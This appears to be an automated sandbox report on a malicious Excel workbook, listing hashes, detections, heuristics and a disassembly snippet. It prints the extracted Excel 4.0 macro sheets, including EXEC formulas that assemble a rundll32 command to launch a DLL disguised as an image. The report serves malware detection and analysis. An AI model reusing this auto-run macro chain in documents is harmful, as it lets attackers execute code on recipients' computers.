Office (OOXML) malware analysis — malicious · 0c5250075dacbd95

MALICIOUS

Office (OOXML)

820.3 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-04

MD5: 46cd49f40cec1cafa1aa575552219d98 SHA-1: 81ac56a6b16070653c47c1374822a0251407792c SHA-256: 0c5250075dacbd954165fda0ecccdc700d0c9e1d89f92c24be5b144cdce82bb5

390 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

This Excel file contains critical Excel 4.0 macro sheet heuristics, including the use of dangerous functions like EXEC and GOTO, and an Auto_Open defined name. These indicate the macro sheet is designed to download and execute a payload. The presence of PEB access, VirtualAlloc, LoadLibrary, and GetProcAddress heuristics further suggests dynamic code loading and execution, typical of a downloader. No specific family could be identified.

Heuristics 10

ClamAV: Xls.Downloader.GreenEnable06210-9869360-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.GreenEnable06210-9869360-0
Excel 4.0 macro sheet (3 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: GOTO, EXEC, HALT critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.

PEB access via FS segment (x86) high SC_PEB_ACCESS

PEB access via FS segment (x86)

Disassembly

Attempted x86 opcode disassembly

0002EED9  64a130000000      mov eax, dword ptr fs:[0x30]
0002EEDF  8945fc            mov dword ptr [ebp - 4], eax
0002EEE2  8b4508            mov eax, dword ptr [ebp + 8]
0002EEE5  85c0              test eax, eax
0002EEE7  750f              jne 0x2eef8
0002EEE9  8b45fc            mov eax, dword ptr [ebp - 4]
0002EEEC  5f                pop edi
0002EEED  5e                pop esi
0002EEEE  5b                pop ebx
0002EEEF  8b4008            mov eax, dword ptr [eax + 8]
0002EEF2  8be5              mov esp, ebp
0002EEF4  5d                pop ebp
0002EEF5  c20400            ret 4
0002EEF8  8b4dfc            mov ecx, dword ptr [ebp - 4]
0002EEFB  c745fc00000000    mov dword ptr [ebp - 4], 0
0002EF02  8b410c            mov eax, dword ptr [ecx + 0xc]
0002EF05  8d500c            lea edx, [eax + 0xc]
0002EF08  8d4814            lea ecx, [eax + 0x14]
0002EF0B  8955e8            mov dword ptr [ebp - 0x18], edx
0002EF0E  83c01c            add eax, 0x1c
0002EF11  8d55e8            lea edx, [ebp - 0x18]
0002EF14  894dec            mov dword ptr [ebp - 0x14], ecx
0002EF17  8945f0            mov dword ptr [ebp - 0x10], eax
0002EF1A  8955f8            mov dword ptr [ebp - 8], edx
0002EF1D  8b45f8            mov eax, dword ptr [ebp - 8]
0002EF20  8b00              mov eax, dword ptr [eax]
0002EF22  8945f4            mov dword ptr [ebp - 0xc], eax
0002EF25  8b18              mov ebx, dword ptr [eax]
0002EF27  3bd8              cmp ebx, eax
0002EF29  7470              je 0x2ef9b
0002EF2B  8b4dfc            mov ecx, dword ptr [ebp - 4]
0002EF2E  8bf3              mov esi, ebx
0002EF30  2bf1              sub esi, ecx
0002EF32  8b4d08            mov ecx, dword ptr [ebp + 8]
0002EF35  51                push ecx
0002EF36  8b5630            mov edx, dword ptr [esi + 0x30]

Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 4 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	1523 bytes
SHA-256: `72f72a5029db390d2af1cd46f4aac85bf6f9783756155fdb0d492d3f8da47a29`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{92BAA9A6-CCD7-4C96-B244-8027D75B3DA4}"><dimension ref="H23:I28"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="10.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="10.5703125" style="2"/></cols><sheetData><row r="23" spans="8:9" x14ac:dyDescent="0.25"><c r="H23" s="2" t="b"><f>SAVE.COPY.AS(I23)</f><v>0</v></c><c r="I23" s="2" t="s"><v>0</v></c></row><row r="28" spans="8:9" x14ac:dyDescent="0.25"><c r="H28" s="2" t="e"><f>GOTO(Nolaert!AK19)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
`xlm_sheet_01.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet2.xml	1674 bytes
SHA-256: `3453b400899904c7ecdaa298e11f9fb45d943cf8127ee9da1c0a4f8c1757e703`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0200-000000000000}"><dimension ref="AK703:AK717"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="12.85546875" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="12.85546875" style="2"/></cols><sheetData><row r="703" spans="37:37" x14ac:dyDescent="0.25"><c r="AK703" s="2" t="b"><f>EXEC(Bkidydj!L15&Bkidydj!L16&Bkidydj!L17)=NOW()=NOW()=NOW()</f><v>0</v></c></row><row r="706" spans="37:37" x14ac:dyDescent="0.25"><c r="AK706" s="2" t="b"><f>WAIT(NOW()+"00:00:07")</f><v>0</v></c></row><row r="717" spans="37:37" x14ac:dyDescent="0.25"><c r="AK717" s="2" t="e"><f>GOTO(Bkidydj!G5)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
`xlm_sheet_02.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet3.xml	2208 bytes
SHA-256: `be73b24ce82142e0f1ca9ad718403c3804bdc56abeca027d033b5f69dbbf4c46`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{72FD7C7A-A3BA-4BD4-A707-DDD14281DB2B}"><dimension ref="E14:L31"/><sheetViews><sheetView showFormulas="1" topLeftCell="A4" workbookViewId="0"><selection activeCell="A4" sqref="A4"/></sheetView></sheetViews><sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="14" spans="7:12" x14ac:dyDescent="0.25"><c r="G14" s="2" t="b"><f>EXEC(E29&E30&E31)</f><v>0</v></c></row><row r="15" spans="7:12" x14ac:dyDescent="0.25"><c r="L15" s="2" t="str"><f>"tar -x"</f><v>tar -x</v></c></row><row r="16" spans="7:12" x14ac:dyDescent="0.25"><c r="L16" s="2" t="s"><v>2</v></c></row><row r="17" spans="5:12" x14ac:dyDescent="0.25"><c r="L17" s="2" t="s"><v>1</v></c></row><row r="19" spans="5:12" x14ac:dyDescent="0.25"><c r="G19" s="2" t="b"><f>HALT()</f><v>0</v></c></row><row r="29" spans="5:12" x14ac:dyDescent="0.25"><c r="E29" s="2" t="str"><f>"run"</f><v>run</v></c></row><row r="30" spans="5:12" x14ac:dyDescent="0.25"><c r="E30" s="2" t="str"><f>"dll32 ..\xl\media\im"</f><v>dll32 ..\xl\media\im</v></c></row><row r="31" spans="5:12" x14ac:dyDescent="0.25"><c r="E31" s="2" t="str"><f>"age2.gif,StartW"</f><v>age2.gif,StartW</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.